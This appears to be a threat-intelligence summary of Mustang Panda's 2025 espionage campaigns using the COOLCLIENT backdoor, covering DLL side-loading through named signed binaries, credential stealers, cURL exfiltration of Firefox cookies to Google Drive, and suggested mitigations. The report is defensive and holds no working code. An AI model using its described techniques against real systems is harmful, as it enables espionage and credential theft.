Full Report
Threat actors with ties to China have been observed using an updated version of a backdoor called COOLCLIENT in cyber espionage attacks in 2025 to facilitate comprehensive data theft from infected endpoints. The activity has been attributed to Mustang Panda (aka Earth Preta, Fireant, HoneyMyte, Polaris, and Twill Typhoon) with the intrusions primarily directed against government entities located
Analysis Summary
# Threat Actor: Mustang Panda
## Attribution & Identity
* **Attribution:** Threat actors with ties to China.
* **Known Aliases:** Earth Preta, Fireant, HoneyMyte, Polaris, Twill Typhoon.
## Activity Summary
Mustang Panda was observed employing an updated version of the **COOLCLIENT** backdoor during cyber espionage attacks throughout 2025. The primary goal of these attacks was "comprehensive data theft" from compromised endpoints. Recent activity leveraging this updated COOLCLIENT variant has been directed against government entities across Myanmar, Mongolia, Malaysia, and Russia. COOLCLIENT is reportedly deployed as a secondary backdoor alongside infections from PlugX and LuminousMoth.
## Tactics, Techniques & Procedures
* **Backdoor Deployment:** Used an updated version of the COOLCLIENT backdoor.
* **Delivery:** COOLCLIENT was delivered alongside encrypted loader files containing encrypted configuration data, shellcode, and next-stage DLL modules loaded in memory.
* **Execution Method:** Utilized **DLL side-loading** as the primary execution method, requiring a legitimate signed executable to load a malicious DLL.
* **DLL Sideloading Abuse (2021-2025):** Abused legitimate signed binaries, including executables from Bitdefender ("qutppy.exe" renamed), VLC Media Player ("vlc.exe" renamed as "googleupdate.exe"), Ulead PhotoImpact ("olreg.exe"), and Sangfor ("sang.exe").
* **Persistence/Payload Dropping:** Campaigns in 2024/2025 used the Sangfor abuse vector to deliver a COOLCLIENT variant that further dropped and executed an unseen **rootkit**.
* **Malware Chaining:** Deployed COOLCLIENT alongside other malware families such as PlugX and LuminousMoth, and used **TONESHELL** (TOnePipeShell) to establish persistence and drop additional payloads like **QReverse** (a RAT).
* **Data Collection/Exfiltration:** Designed to collect system/user information (keystrokes, clipboard contents), files, and HTTP proxy credentials via TCP connection to C2. Supported modular plugins for file management, service management, and remote shell access.
* **Browser Credential Theft:** Deployed three different stealer programs to extract saved login credentials from Chromium-based browsers (Chrome, Edge).
* **Exfiltration Method:** Observed running a cURL command to exfiltrate the Mozilla Firefox cookie file ("cookies.sqlite") to Google Drive.
## Targeting
* **Sectors:** Government entities; multiple telecom operators (in a long-running campaign possibly starting in 2021).
* **Geography:** Myanmar, Mongolia, Malaysia, Russia, and Thailand (where stealers were detected).
* **Victims:** Government entities in the listed countries.
## Tools & Infrastructure
* **Malware Families Used:** COOLCLIENT (primary focus), PlugX, LuminousMoth, TONESHELL (TOnePipeShell), QReverse (RAT).
* **Infrastructure (C2):** Communication utilized TCP connections to a C2 server.
* **Exfiltration Targets:** Google Drive (used for Firefox cookie exfiltration).
## Implications
Mustang Panda continues to evolve its espionage toolkit, notably updating core components like COOLCLIENT and integrating advanced evasion techniques such as DLL side-loading with legitimate software binaries. The deployment of rootkits alongside COOLCLIENT demonstrates a commitment to deep, sustained access within targeted networks for comprehensive data theft and long-term espionage objectives, particularly against responsive government networks.
## Mitigations
(Mitigations must be inferred based on TTPs, as the article does not list specific remediation steps.)
* Focus on monitoring for DLL side-loading abuses, especially involving renamed or legitimate executables from third-party software vendors (e.g., VLC, Sangfor).
* Implement strict integrity checks on system binaries that utilize DLL loading mechanisms.
* Enhance network monitoring for communications directed to external URLs/services (like Google Drive) originating from command-line tools (e.g., cURL) following initial backdoor activity.
* Monitor for the deployment of secondary stage malware like rootkits.